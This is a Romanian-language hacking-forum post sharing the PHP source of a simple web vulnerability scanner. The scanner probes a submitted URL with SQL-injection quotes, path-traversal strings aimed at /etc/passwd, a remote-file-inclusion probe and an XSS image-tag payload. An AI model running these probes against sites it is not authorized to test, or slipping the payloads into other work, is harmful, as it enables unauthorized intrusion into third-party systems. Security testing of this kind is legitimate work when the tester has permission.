Jump to content
cosminkent

Vulnerability Scanner

Recommended Posts

Untitled.png



<?php
set_time_limit(0);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Fara titlu de prezentare </title>


<style type="text/css">

body
{
color: #ffffff;
text-shadow: 2px 2px #000000;
background-color: #282828;
font-family: Arial, Helvetica, sans-serif;
}

pre
{
background-color: #353535;
border: solid 1px #505050;
}

input
{
font-family: Arial, Helvetica, sans-serif;
}

.Button
{
padding: 5px 10px;
background: #303030;
border: solid #101010 1px;
color: #fff;
cursor: pointer;
font-weight: bold;
border-radius: 5px;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
text-shadow: 1px 1px #000;
}

.Input
{
border: solid #101010 1px;
color: white;
font-weight: bold;
padding: 3px;
background-color: #252525;
}
</style>
</head>
<body>
<div align="center">
<pre>
<img src="http://i.imgur.com/oTFJi.jpg" width="280" height="125" title="RST" alt="RSTFORUMS" />
</pre>

<form method="POST" action="">
Adauga url : <input type="text" name="url" value="<?php if(isset($_POST['url'])){echo(htmlentities($_POST['url']));}?>"
placeholder="http://example.com/index.php?id=1'" size="75" class="Input" />
<input type="submit" name="submit" value="Scanare" class="Button" />
</form>

<br />
<?php

##RST
##FORUMS

class Vulnscanner
{
private $sql = array("'",'"');
private $rfi = array("http://www.facebook.com");
private $lfi = array("../etc/passwd",
"../../etc/passwd",
"../../../etc/passwd",
"../../../../etc/passwd",
"../../../../../etc/passwd",
"../../../../../../etc/passwd");
private $xss = array("'\"/><img src=\"http://rstforums.com\"/>");



private $sqlerrors = array("mysql_", "A aparut o eroare in sintaxa SQL",
"SQL Error", "Eroare baza de date", "Eroare MySQL");
private $rfierrors = array("Bun venit pe Facebook - Inregistreaza-te sau Logheaza-te");
private $lfierrors = array("root:x:0:0:root:", "EROARE: Nu exista fisierul sau directorul specificat");
private $xsserrors = array("<img src=\"http://rstforums.com\"/>");

public function isvalid($link)
{
if(filter_var($link,FILTER_VALIDATE_URL) && strstr($link,"="))
return true;
return false;
}

private function getcontents($link)
{
$agent= 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0';
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_VERBOSE, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_URL,$link);
$result=curl_exec($ch);
return $result;
}

private function errorcheck($url,$addtourl,$errorar)
{
foreach($addtourl as $val)
{
$link = $url.$val;
$contents = $this->getcontents($link);
foreach($errorar as $err)
{
if(strstr($contents, $err))
return true;
}
}
return false;
}

public function issqlvulnerable($link)
{
$orig = $link;
if($this->errorcheck($orig,$this->sql,$this->sqlerrors))
echo htmlentities($orig) ." Site-ul <span style=\"color: green;\">ESTE</span> vulnerabil SQL Injection.<br />";
else
echo htmlentities($orig) ." Probabil <span style=\"color: red;\">NU</span> este vulnerabil SQL Injection.<br />";
}

public function isrfivulnerable($link)
{
$orig = $link;
$link = substr($link,0,strpos($link,'=')+1);
if($this->errorcheck($link,$this->rfi,$this->rfierrors))
echo htmlentities($orig) ." Site-ul <span style=\"color: green;\">ESTE</span> vulnerabil RFI.<br />";
else
echo htmlentities($orig) ." Probabil <span style=\"color: red;\">NU</span> este vulnerabil RFI.<br />";
}
public function islfivulnerable($link)
{
$orig = $link;
$link = substr($link,0,strpos($link,'=')+1);
if($this->errorcheck($link,$this->lfi,$this->lfierrors))
echo htmlentities($orig) ." Site-ul <span style=\"color: green;\">ESTE</span> vulnerabil LFI.<br />";
else
echo htmlentities($orig) ." Probabil <span style=\"color: red;\">NU</span> este vulnerabil LFI.<br />";

}
public function isxssvulnerable($link)
{
$orig = $link;
$link = substr($link,0,strpos($link,'=')+1);
if($this->errorcheck($link,$this->xss,$this->xsserrors))
echo htmlentities($orig) ." Site-ul <span style=\"color: green;\">ESTE</span> vulnerabil XSS.<br />";
else
echo htmlentities($orig) ." Probabil <span style=\"color: red;\">NU</span> este vulnerabil XSS.<br />";
}

} // END OF CLASS



if(isset($_POST['url']) && isset($_POST['submit']))
{
$obj = new Vulnscanner();
$link = $_POST['url'];
if($obj->isvalid($link))
{
$obj->islfivulnerable($link);
$obj->isxssvulnerable($link);
$obj->issqlvulnerable($link);
$obj->isrfivulnerable($link);
}
else
{
echo "<span style=\"color: red;\">". htmlentities($link) ." nu este un link valid.</span>";
}
}
?>
<br /><br /><br /><br /><br /><br /><br /><br />
<br /><br /><br /><br /><br /><br /><br /><br />
<br /><br /><br />
<a href="http://rstforums.com"><span style=\"color: red;\">RSTFORUMS.COM</span></a>
</div>
</body>
</html>


Source: HC

Poate va este de folos :)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...